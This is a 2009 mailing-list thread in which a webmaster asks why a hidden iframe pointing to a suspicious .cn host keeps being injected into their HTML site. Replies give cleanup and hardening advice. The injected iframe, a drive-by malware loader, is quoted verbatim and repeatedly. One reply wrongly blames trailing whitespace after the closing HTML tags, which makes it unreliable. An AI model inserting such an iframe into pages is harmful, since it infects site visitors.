El grupo al cual envías entradas es un grupo Usenet. Si envías mensajes a este grupo, cualquier usuario de Internet podrá ver tu dirección de correo electrónico
My website is a HTML based website.
everything was going fine until i discovered a warning by Google ,that
the site in infected by virus:This site may harm your computer.
I checked the website and found some <iframe src="http://
namemartfilmlife.cn:8080/index.php" width=146 height=179
style="visibility: hidden"></iframe>
types of malicious codes.
I removed them but they are coming again.
I checked the server reports and the ftp password was also not leaked.
I want top know from where does this <iframe error comes from.
Does submitting to directories,search engines and blogs,bookmarking or
submitting cause these errors?????????????
I have studied that HTML and .net sites are more prone to be infected
by these iframe errors
Are Seo activities responsible for these kind of problems.
Also ,please provide me solutions to permanently protect websites from
being infected.
Actually my site was also like this only. Then I have submitted my site to
this stopbadware.org <http://stopbadware.org/> site. And ask them to review.
If your site has linked with any third party site means please check it.
Then if they found that your site was not spreading badware means it will
remove your site from warning list. I think this might help you so.
On Thu, Jun 18, 2009 at 11:49 PM, aaruhi <kamlav...@gmail.com> wrote:
> My website is a HTML based website.
> everything was going fine until i discovered a warning by Google ,that
> the site in infected by virus:This site may harm your computer.
> I checked the website and found some <iframe src="http://
> namemartfilmlife.cn:8080/index.php" width=146 height=179
> style="visibility: hidden"></iframe>
> types of malicious codes.
> I removed them but they are coming again.
> I checked the server reports and the ftp password was also not leaked.
> I want top know from where does this <iframe error comes from.
> Does submitting to directories,search engines and blogs,bookmarking or
> submitting cause these errors?????????????
> I have studied that HTML and .net sites are more prone to be infected
> by these iframe errors
> Are Seo activities responsible for these kind of problems.
> Also ,please provide me solutions to permanently protect websites from
> being infected.
On Fri, Jun 19, 2009 at 12:19 PM, aaruhi <kamlav...@gmail.com> wrote:
> My website is a HTML based website.
> everything was going fine until i discovered a warning by Google ,that
> the site in infected by virus:This site may harm your computer.
> I checked the website and found some <iframe src="http://
> namemartfilmlife.cn:8080/index.php" width=146 height=179
> style="visibility: hidden"></iframe>
> types of malicious codes.
> I removed them but they are coming again.
> I checked the server reports and the ftp password was also not leaked.
> I want top know from where does this <iframe error comes from.
> Does submitting to directories,search engines and blogs,bookmarking or
> submitting cause these errors?????????????
> I have studied that HTML and .net sites are more prone to be infected
> by these iframe errors
> Are Seo activities responsible for these kind of problems.
> Also ,please provide me solutions to permanently protect websites from
> being infected.
> My website is a HTML based website.
> everything was going fine until i discovered a warning by Google ,that
> the site in infected by virus:This site may harm your computer.
> I checked the website and found some <iframe src="http://
> namemartfilmlife.cn:8080/index.php" width=146 height=179
> style="visibility: hidden"></iframe>
> types of malicious codes.
> I removed them but they are coming again.
> I checked the server reports and the ftp password was also not leaked.
> I want top know from where does this <iframe error comes from.
> Does submitting to directories,search engines and blogs,bookmarking or
> submitting cause these errors?????????????
> I have studied that HTML and .net sites are more prone to be infected
> by these iframe errors
> Are Seo activities responsible for these kind of problems.
> Also ,please provide me solutions to permanently protect websites from
> being infected.
If your page were somewhat altered, this means that some malicious user has
got (at least partial) control over your site.
You need to work in 2 directions, in that order:
a - protect against any new intrusion
b - find and cure the intrusion.
a - using your ftp, change access rights to files and directories. this is
usually doing chmod or its equivalent. Most directories should be 755 or 705
(but not 777 or 757), most files should be 644 (but not 666 or 646).
You probably have some 'cache' or 'tmp' or 'media' directory, the rights of
which MUST be (for your application) 777. Place an empty file in each of
these directories, named 'index.htm', and give this file chmod 444. While
you are there, check for any suspicious file. If it is a cache, you can
probably delete all files (your freshly created index.htm will not be
deleted, since it is not 644)
b - look and cure any change that has happened in your directories
-- any new file? did you create it? --> rename it (just in case it is really
needed!) by its current name followed by '-old'. the file will be there but
will not be accessable. chmod it to 400
-- any previously existing file that has been changed? look at the change,
and comment it out (for a start... you will remove it later)
-- You need to check carefully your index.* files in your main directory and
the main subdirs, eg /admin/ if any
-- do you have any directory or file called admin, admin.html, admin.php
etc? install ? do you have a phpmyadmin directory? with that name?
-- look at the directories disallowed in your robots.txt file . any strange
file or recent change in these directories?
c - since b/ took some time, recheck a/
d - (you have more time for this) look at your apache logs if you have them.
These are HUGE files... but you will probably find some calls to your pages
with something like
?...http://somesite If somesite is not familiar... this is probably an attack... you can look at
the query etc..
> After </body></html> Please dont keep any space, if there any space
> this iframe will appear on page. hope this is helpful.
> http://www.infrascape.com/
> On Jun 19, 11:49 am, aaruhi <kamlav...@gmail.com> wrote:
> > My website is a HTML based website.
> > everything was going fine until i discovered a warning by Google ,that
> > the site in infected by virus:This site may harm your computer.
> > I checked the website and found some <iframe src="http://
> > namemartfilmlife.cn:8080/index.php" width=146 height=179
> > style="visibility: hidden"></iframe>
> > types of malicious codes.
> > I removed them but they are coming again.
> > I checked the server reports and the ftp password was also not leaked.
> > I want top know from where does this <iframe error comes from.
> > Does submitting to directories,search engines and blogs,bookmarking or
> > submitting cause these errors?????????????
> > I have studied that HTML and .net sites are more prone to be infected
> > by these iframe errors
> > Are Seo activities responsible for these kind of problems.
> > Also ,please provide me solutions to permanently protect websites from
> > being infected.
surely your website is hacked....please change your FTP password and scan
your system from where u upload the file to server and all the
system where the development done.............may be all the system
infected....its very serious issue...I had faced for my two website......IF
issue is not solved ..i will recommend to change your hosting to some where
else.
On Fri, Jun 26, 2009 at 1:14 PM, SEO Sudhakar <infrascape...@gmail.com>wrote:
> After </body></html> Please dont keep any space, if there any space
> this iframe will appear on page. hope this is helpful.
> http://www.infrascape.com/
> On Jun 19, 11:49 am, aaruhi <kamlav...@gmail.com> wrote:
> > My website is a HTML based website.
> > everything was going fine until i discovered a warning by Google ,that
> > the site in infected by virus:This site may harm your computer.
> > I checked the website and found some <iframe src="http://
> > namemartfilmlife.cn:8080/index.php" width=146 height=179
> > style="visibility: hidden"></iframe>
> > types of malicious codes.
> > I removed them but they are coming again.
> > I checked the server reports and the ftp password was also not leaked.
> > I want top know from where does this <iframe error comes from.
> > Does submitting to directories,search engines and blogs,bookmarking or
> > submitting cause these errors?????????????
> > I have studied that HTML and .net sites are more prone to be infected
> > by these iframe errors
> > Are Seo activities responsible for these kind of problems.
> > Also ,please provide me solutions to permanently protect websites from
> > being infected.
> wrote:
> surely your website is hacked....please change your FTP password and scan
> your system from where u upload the file to server and all the
> system where the development done.............may be all the system
> infected....its very serious issue...I had faced for my two website......IF
> issue is not solved ..i will recommend to change your hosting to some where
> else.
> On Fri, Jun 26, 2009 at 1:14 PM, SEO Sudhakar <infrascape...@gmail.com>wrote:
>> After </body></html> Please dont keep any space, if there any space
>> this iframe will appear on page. hope this is helpful.
>> http://www.infrascape.com/
>> On Jun 19, 11:49 am, aaruhi <kamlav...@gmail.com> wrote:
>> > My website is a HTML based website.
>> > everything was going fine until i discovered a warning by Google ,that
>> > the site in infected by virus:This site may harm your computer.
>> > I checked the website and found some <iframe src="http://
>> > namemartfilmlife.cn:8080/index.php" width=146 height=179
>> > style="visibility: hidden"></iframe>
>> > types of malicious codes.
>> > I removed them but they are coming again.
>> > I checked the server reports and the ftp password was also not leaked.
>> > I want top know from where does this <iframe error comes from.
>> > Does submitting to directories,search engines and blogs,bookmarking or
>> > submitting cause these errors?????????????
>> > I have studied that HTML and .net sites are more prone to be infected
>> > by these iframe errors
>> > Are Seo activities responsible for these kind of problems.
>> > Also ,please provide me solutions to permanently protect websites from
>> > being infected.